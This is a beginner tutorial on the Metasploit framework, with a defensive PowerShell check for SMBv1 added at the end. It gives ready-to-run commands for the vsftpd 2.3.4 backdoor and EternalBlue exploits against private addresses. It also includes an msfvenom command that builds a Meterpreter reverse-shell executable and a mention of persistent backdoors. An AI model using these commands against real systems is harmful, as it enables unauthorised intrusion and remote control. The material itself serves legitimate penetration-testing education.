What is Metasploit?
Metasploit is an open-source framework used by cybersecurity professionals for identifying, validating, and exploiting vulnerabilities in systems. It provides a powerful environment to create and launch payloads, automate attacks, and perform post-exploitation tasks in a controlled and ethical manner.
Core Capabilities
- Exploit Development and Usage
- Payload Generation and Execution
- Post-Exploitation Modules
- Auxiliary Scanning and Enumeration Tools
- Integration with databases and automation scripts
Getting Started with Metasploit
Step 1: Launch Metasploit Console
msfconsole
This command opens the main interactive shell of Metasploit.
Step 2: Search for an Exploit
search vsftpd
This lists every module whose name or description matches "vsftpd", the FTP service used in the next step.
Step 3: Use an Exploit
use exploit/unix/ftp/vsftpd_234_backdoor
Selects the exploit module and makes its options the current context, so they can be set in the following steps.
Step 4: Set Required Options
set RHOSTS 192.168.1.105
Defines the target IP address or range.
Step 5: Run the Exploit
exploit
Launches the attack against the specified target.
Advanced Features
Custom Payloads
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > shell.exe
Generates a Windows executable containing a Meterpreter reverse TCP payload that connects back to the listener at LHOST:LPORT.
Persistent Backdoors
Use the persistence script in Meterpreter sessions to maintain access.
Database Integration
db_nmap -sV 192.168.1.0/24
Scans a network and stores results in the Metasploit database for reference.
Real-World Example: EternalBlue (MS17-010)
This exploit targets a vulnerability in SMB v1 on Windows systems.
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.200
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.100
exploit
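As the defender's counterpart to the module above, here is an added PowerShell check (not from the original page) that reports whether a Windows host you administer still has SMBv1 enabled, the precondition EternalBlue depends on. It assumes Windows 8.1 / Server 2012 R2 or later with the SmbShare and DISM cmdlets available, and the function name Get-Smb1Status is the example's own.

```powershell
# Added example (not from the original page): audit SMBv1 exposure on a Windows
# host you administer. MS17-010 / EternalBlue requires SMBv1 to be enabled.
# Run from an elevated PowerShell prompt on Windows 8.1 / Server 2012 R2 or later.

function Get-Smb1Status {
    # Server-side setting: does this host still accept SMB1 connections?
    $server = Get-SmbServerConfiguration |
        Select-Object -ExpandProperty EnableSMB1Protocol

    # Is the SMB1 optional feature (client/server binaries) installed at all?
    # -ErrorAction SilentlyContinue covers images where the feature is absent.
    $feature = Get-WindowsOptionalFeature -Online -FeatureName SMB1Protocol `
        -ErrorAction SilentlyContinue

    [PSCustomObject]@{
        ComputerName      = $env:COMPUTERNAME
        Smb1ServerEnabled = [bool]$server
        Smb1FeatureState  = if ($feature) { $feature.State.ToString() } else { 'NotPresent' }
    }
}

$status = Get-Smb1Status
$status | Format-List

if ($status.Smb1ServerEnabled) {
    Write-Warning "SMBv1 is enabled; this host is in scope for MS17-010-class exploits."
    # Remediation (uncomment to apply): stop accepting SMB1 and remove the feature.
    # Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
    # Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -NoRestart
} else {
    Write-Output "SMBv1 server protocol is disabled on $($status.ComputerName)."
}
```

Disabling SMBv1 removes the attack surface regardless of patch level, but apply the MS17-010 update as well, since the check above only inspects the protocol setting.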
Tips & Best Practices
- Always test exploits in lab environments first
- Use info to get full documentation on any module
- List active sessions with sessions -l and return to one later with sessions -i <id>
- Combine with Nmap, Nikto, and Burp for full attack chains